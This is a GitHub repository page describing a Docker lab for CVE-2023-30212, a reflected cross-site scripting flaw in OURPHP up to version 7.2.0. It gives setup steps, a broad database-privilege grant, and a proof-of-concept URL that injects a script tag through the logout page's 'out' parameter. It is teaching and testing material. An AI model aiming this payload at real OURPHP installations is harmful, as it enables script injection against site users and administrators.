Giters

libasmon / Exploite-CVE-2023-30212-Vulnerability

Docker environment and exploit the CVE-2023-30212 vulnerabilityVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

create a vulnerable Docker environment that is susceptible to CVE-2023-30212

Description

Docker environment and exploit the CVE-2023-30212 vulnerabilityVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks

OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php

Configure Docker Exploit CVE-2023-30212 vulnerability

Installion of Docker

  • Download dockerfile and extract it

    https://down.chinaz.com/api/index/download?id=51308&type=code

  • Download exploit CVE 2023-30212

  • Open Terminal in the folder where you saved the dockerfile

  • Install the Docker meachine

    sudo apt update

    sudo apt install docker.io

configure Docker image and Docker condainer

  • build a Docker image based on the Dockerfile present in the current directory

    docker build -t < specifies the tag for the image>

    docker build -t test .

  • used to run a Docker container based on the image with the tag and map port on the host machine to port inside the container.

    docker run -d -p < Docker image id>

    docker run -d -p 8080:80 test

  • check the docker image

    docker ps

  • Get a new container id

    bb18debddccc test "docker-php-entrypoi…" 4 minutes ago Up 4 minutes 0.0.0.0:8080->80/tcp, :::8080->80/tcp angry_turing

  • execute an interactive bash session inside a running Docker containe

    docker exec -it bb18debddccc /bin/bash

*Get docker shell

> root@bb18debddccc:/var/www/html#

  • set mysql database

    root@bb18debddccc:/var/www/html# mysql

    Welcome to the MariaDB monitor. Commands end with ; or \g.

    Your MariaDB connection id is 38

    Server version: 10.3.38-MariaDB-0+deb10u1 Debian 10

    Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

    MariaDB [(none)]>

  • MySQL or MariaDB to grant all privileges

    GRANT ALL PRIVILEGES ON . TO ' user account'@'localhost' IDENTIFIED BY 'user password' WITH GRANT OPTION;

    GRANT ALL PRIVILEGES ON . TO ' root'@'localhost' IDENTIFIED BY 'password' WITH GRANT OPTION;

    This is a SQL command typically used in a database management system like MySQL or MariaDB to grant all privileges to the 'root' user on all databases and tables in the current system.

Exploit CVE-2023-30212 vulnerability

Url: http://localhost:8080/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(xss)</script>

Referal

*https://nvd.nist.gov/vuln/detail/CVE-2023-30212

*https://docs.docker.com/engine/install/

chatGpt

About

Docker environment and exploit the CVE-2023-30212 vulnerabilityVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks

Languages

Language:PHP 72.6%Language:HTML 27.4%